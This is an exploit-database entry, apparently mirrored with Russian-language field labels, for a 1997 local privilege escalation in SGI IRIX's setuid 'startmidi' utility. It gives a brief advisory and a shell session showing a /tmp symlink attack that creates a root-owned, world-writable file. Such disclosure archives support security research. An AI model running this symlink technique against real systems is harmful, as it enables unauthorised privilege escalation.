Exploit SGI IRIX 6.4 - 'startmidi' Local Privilege Escalation

[Exploiter]

EDB-ID

19355

Проверка EDB

1. Пройдено

Автор

DAVID HEDLEY

Тип уязвимости

LOCAL

Платформа

IRIX

CVE

cve-1999-0959

Дата публикации

1997-02-09

SGI IRIX 6.4 - 'startmidi' Local Privilege Escalation

source: https://www.securityfocus.com/bid/469/info

A vulnerability exists in the startmidi program from Silicon Graphics. This utility is included with Irix versions 5.x and 6.x with the Iris Digital Media Execution Environment. startmidi is setuid root, and creates a temporary file called /tmp/.midipid. It does not check to see if this file already exists, and is a symbolic link. As such, it can be used to create root owned files, with permissions as set by the user umask.


% umask 0
% ln -s /blardyblar /tmp/.midipid
% startmidi -d /dev/ttyd1
% ls -l /blardyblar
-rw-rw-rw- 1 root pgrad 0 Feb 9 17:46 /blardyblar
% stopmidi -d /dev/ttyd1
%